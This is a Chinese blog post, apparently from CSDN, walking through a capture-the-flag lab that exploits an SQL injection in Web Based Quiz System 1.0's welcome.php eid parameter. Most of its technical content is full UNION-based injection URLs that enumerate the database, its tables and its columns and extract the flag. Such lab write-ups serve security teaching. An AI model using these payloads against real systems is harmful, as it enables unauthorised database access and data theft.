Web Based Quiz System SQL注入

最新推荐文章于 2024-05-31 12:37:18 发布
最新推荐文章于 2024-05-31 12:37:18 发布
阅读量590 收藏
点赞数 1
文章标签: sql 5G 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46420165/article/details/128241131
版权
一,靶场介绍

原文地址
在Web Based Quiz System 1.0中曾发现一漏洞,此漏洞被分类为致命。 受影响的是未知功能文件:welcome.php。 手动调试的软件参数:eid不合法输入可导致 SQL注入 (漏洞地址在下面写出)

二,影响版本

Web Based Quiz System 1.0

三,漏洞检测
3.1 复制路径在搜索引擎上进行访问,访问后页面

3.2 进行注册

3.3 登录后页面

3.4 点击序列3 start

3.5 测试sql注入漏洞
http://eci-2zegkoqp5gwrl79ki5gf.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0%27&n=1&t=10

在eid后添加 ’ 用于测试sql漏洞 %27在url编码中是 ‘ 然后在%27后加–+

http://eci-2zegkoqp5gwrl79ki5gf.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0%27%20--+&n=1&t=10

3.6 进行查字段数
http://eci-2zegkoqp5gwrl79ki5gf.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0%27%20%20order%20by%201--+&n=1&t=10

http://eci-2zegkoqp5gwrl79ki5gf.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0' order by 6--+&n=1&t=10

进行了报错 看来他的字段有5个

3.7 查询回显点
http://eci-2zegkoqp5gwrl79ki5gf.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0%27%20and%201=2%20union%20select%201,2,3,4,5%20--+&n=1&t=10

回显点是3

3.8 查询数据库名

http://eci-2zegkoqp5gwrl79ki5gf.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0%27%20and%201=2%20union%20select%201,2,database(),4,5%20--+&n=1&t=10
3.9 查询表名
http://eci-2zegkoqp5gwrl79ki5gf.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0%27%20and%201=2%20union%20select%201,2,group_concat(table_name),4,5%20from%20information_schema.tables%20where%20table_schema=%27ctf%27--+&n=1&t=10

3.10 查询字段名
http://eci-2zegkoqp5gwrl79ki5gf.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0%27%20and%201=2%20union%20select%201,2,group_concat(column_name),4,5%20from%20information_schema.columns%20where%20table_schema=%27ctf%27%20and%20table_name=%27flag%27%20--+&n=1&t=10

3.11查询字段数据
http://eci-2zegkoqp5gwrl79ki5gf.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0%27%20and%201=2%20union%20select%201,2,flag,4,5%20from%20flag--+&n=1&t=10

成功获得flag然后提交flag即可

3.12靶场地址
https://yunjing.ichunqiu.com/ranking/summary?id=AzBXbl1oAmQ

注册送5沙硕 利用沙硕可挑战内网靶场 快来薅羊毛

栖迟!
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Web_Quiz_Engine
04-10
Web_Quiz_Engine 该项目开发了一个多用户Web服务,用于使用REST API,嵌入式数据库,安全性和其他技术来创建和解决测验。 项目是从Intellij Idea照原样添加的。 在这里,我集中于完全没有用户界面的服务器端(...
春秋云镜CTF靶场解题实录
一位热爱网安的年轻人的博客
11-23 846
春秋云镜CTF靶场
春秋云镜 CVE-2022-32991
qq_22002773的博客
06-21 330
CVE-2022-32991
[漏洞复现]Web Based Quiz System(CVE-2022-32991)
k5664524的博客
01-10 441
Web Based Quiz System v1.0版本存在SQL注入漏洞,该漏洞源于welcome.php中的eid参数缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令窃取数据库敏感数据。
CVE-2022-32991 Web Based Quiz System SQL注入
qq_38733240的博客
11-19 637
Web Based Quiz System 1.0中曾发现一漏洞,此漏洞被分类为致命。受影响的是未知功能文件:welcome.php。手动调试的软件参数:eid不合法输入可导致 SQL注入
春秋云镜 CVE-2022-32991 Web Based Quiz System v1.0 [超详细新手教程]
starttv的博客
10-26 732
Web Based Quiz System v1.0 通过welcome.php 中的eid 参数被发现包含一个SQL 注入漏洞。
春秋云镜 免费空间 部分web题目
qq_73767109的博客
04-11 242
春秋云镜 靶场免费空间(持续更新) Web Based Quiz System SQL注入;Pharmacy Management System shell upload
i春秋云境.com【1-3】
qq_58091216的博客
03-06 621
i春秋云境.com
春秋云镜CVE-2022-32991 Web Based Quiz System SQL注入
Ambition_sec的博客
11-16 596
春秋云镜CVE-2022-32991 Web Based Quiz System SQL注入
Quiz-Management-System
04-02
测验管理系统
big-web-quiz
05-26
大网测验 存在于: Github 小故障 这是怎么回事? 在2019年的Chrome开发者峰会上,。 这是我们(匆忙地)构建的用于实现所有这些的东西。 您可以使用它来运行自己的实时民意测验,演示幻灯片和运行竞赛。...
quizJS:简单JavaScript Web应用程序“ Quiz
05-27
测验网页 简单规则:正确答案将以绿色突出显示,而错误答案将以红色突出显示。 未来功能 我计划在不久的将来实现该列表的一些功能: 暗模式 稳定的手机版 选择测验主题的能力 测验中图书馆问题顺序的随机化器 ...
Web Based Quiz System SQL注入漏洞复现(CVE-2022-32991)
千寻的博客
11-25 1035
`Sourcecodester Web Based Quiz System`是 (`Sourcecodester`)开源的一个应用软件。用于一个简单的在线基础的项目。 `Web Based Quiz System v1.0`版本存在安全漏洞,该漏洞源于通过` welcome.php `中的`eid` 参数发现存在 SQL 注入漏洞。该CMS的welcome.php中存在SQL注入攻击。
MYSQL
12-20 201
数据库表说明: 用户权限表 select * from mysql.user 获取表名和注释映射 [x] TABLES:存储数据库中的表信息 表属于哪个数据库,表的类型、存储引擎、创建时间等信息 select * from information_schema.tables...
Web安全之SQL注入(一)
weixin_50593647的博客
09-26 197
一、有关知识点 SQL语言 :结构化查询语言(Structured Query Language),简称SQL,是数据库的标准查询语言,可以通过DBMS(数据库管理系统)对数据库进行定义数据,操纵数据,查询数据,数据控制等。 数据库(database):数据库是一个按数据结构来存储和管理数据的计算机软件系统。 两者联系:数据库管理系统(DBMS-Database Management System)就是通过SQL语言对数据库进行管理的软件,我们常说的Mysql数据库Sql Ser...
【思考】依赖注入有几种形式?
奋进的小白粥
08-26 1141
转载自:https://www.cnblogs.com/zhuwoyao88/p/6596295.html。 在我面试的时候,常会问面试者一个问题,就是依赖注入有几种方式,发现面试者的回答五花八门,有回答两种的,也有回答三种的,四种的。其实正确的答案是两种:构造器注入和setter注入。 提到依赖注入,就不能不说装配。有些初学者总是会把这两个概念搞混,这个博文就是来跟大家讨论这两个概念以及其中详细的原理。依赖注入的本质就是装配,装配是依赖注入的具体行为(这就好比你接你女朋友回家,用自行车或者电动车都可以
【PostgreSQL17新特性之-explain命令新增选项】
最新发布
小怪兽的博客
05-31 542
PostgreSQL17-beta1版本近日发布了,新版本里,explain命令新增了两个选项,分别是MEMORY 和SUMMARY。
基础—SQL—DQL(数据查询语言)聚合函数
m0_74363339的博客
05-30 256
这篇博客主要讲到了SQL分类中的DQL(数据查询语言)—聚合函数的讲解,聚合函数比较简单,但它主要配合着分组查询进行数据查询的操作,注意NULL的字段值不参与聚合函数的运算......
PostgreSQL常用插件
PGCCC的博客
05-29 511
1.提供 PostgreSQL 实例的操作系统级别的资源使用情况,包括缓存命中率和磁盘 IO 等。通过使用这些插件,您可以大大增强 PostgreSQL 的功能,满足各种复杂的应用需求。1.提供三元组(trigram)相似度匹配和索引功能,常用于模糊搜索和文本相似度匹配。1.增加对地理空间数据的支持,使 PostgreSQL 成为一个功能强大的空间数据库。1.PostgreSQL 的过程语言,允许用户编写存储过程和触发器。1.基于逻辑复制的插件,提供更细粒度的数据复制控制和双向复制能力。
cwm fjordbank glyphs vext quiz
01-31
cwm fjordbank glyphs vext quiz 是一个看起来很奇怪的词组,它实际上是一个由五个单词组成的谜题,每个单词都有特定的含义和背景。 首先是"cwm",它是一个威尔士语的词,表示峡谷或山谷的意思。这是由于威尔士地理...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值